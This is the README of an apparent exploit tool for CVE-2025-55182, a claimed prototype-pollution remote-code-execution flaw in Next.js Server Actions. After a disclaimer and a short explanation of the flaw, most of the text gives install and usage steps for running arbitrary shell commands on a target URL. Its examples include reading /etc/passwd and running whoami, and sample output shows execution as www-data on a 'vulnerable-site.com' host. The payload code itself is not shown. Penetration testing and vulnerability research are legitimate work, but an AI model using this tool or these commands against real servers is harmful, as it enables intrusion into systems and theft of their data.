
CVE-2025-55182 Next.js RCE Exploit Tool
Documentação em Chinês | Análise do Princípio da Vulnerabilidade
[!CAUTION]
⚠️ AVISO - LEIA ANTES DE USAR
Esta ferramenta é destinada APENAS para:
- Pesquisadores de segurança realizando verificação de vulnerabilidades
- Testes de penetração autorizados com permissão explícita
- Propósitos educacionais e de aprendizado
Acesso não autorizado a sistemas de computador é ILEGAL.
Ao usar esta ferramenta, você concorda que:
- Você obteve a devida autorização antes de testar qualquer sistema
- Você não usará esta ferramenta para fins maliciosos
- Você é o único responsável por suas ações e quaisquer consequências
O autor não assume NENHUMA responsabilidade pelo uso indevido desta ferramenta.
Uma ferramenta de exploração de execução remota de código (RCE) para a vulnerabilidade de poluição de protótipo do lado do servidor no Next.js.
CVE-2025-55182 é uma vulnerabilidade crítica de segurança que afeta o Next.js, permitindo que atacantes obtenham execução remota de código através de requisições maliciosas que exploram a poluição de protótipo.
📖 Para análise técnica detalhada, veja EXPLOIT.md
Esta vulnerabilidade explora o mecanismo de manipulação de requisições de Server Actions do Next.js, alcançando execução arbitrária de código através da poluição da cadeia de protótipos __proto__ combinada com o construtor Function.
# Using yarn
yarn install
# Using npm
npm install
# Basic usage
node index.js <target_url> [command]
# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"
# Run the tool
yarn start http://localhost:3000 "whoami"
# Or use alias
yarn exploit http://localhost:3000 "ls -la"
# Show help
yarn help
# Link globally
yarn link
# or
npm link
# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"
# Unlink
yarn unlink
Usage:
cve-2025-55182 <url> [command]
Arguments:
url Target URL (required)
command Command to execute (default: whoami)
Options:
-h, --help Show help message
-v, --version Show version number
A ferramenta exibe os resultados no formato JSON:
{
"success": true,
"message": "",
"data": "command execution result"
}
{
"success": false,
"message": "error message",
"data": null
}
$ cve-2025-55182 http://vulnerable-site.com "id"
{
"success": true,
"message": "",
"data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}